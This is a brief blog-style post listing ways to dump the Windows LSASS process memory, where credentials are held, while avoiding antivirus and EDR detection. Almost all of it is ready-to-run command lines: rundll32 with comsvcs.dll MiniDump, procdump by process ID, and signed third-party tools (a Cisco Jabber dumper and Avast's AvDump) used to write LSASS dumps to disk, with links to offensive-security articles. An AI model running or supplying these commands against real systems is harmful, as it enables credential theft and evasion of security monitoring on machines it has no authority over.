Reading Time: < 1 minute

A few techniques to avoid AV or EDR detection

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

procdump <process id> instead of the word lsass

Signed Executable which can be used also

CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp

See original article : https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

Avast Dumper : AvDump.exe –pid 676 –exception_ptr 0 –thread_id 0 –dump_level 1 –dump_file E:\lsass.dmp –min_interval 0

See orginal article : https://www.archcloudlabs.com/projects/dumping-memory-with-av/

0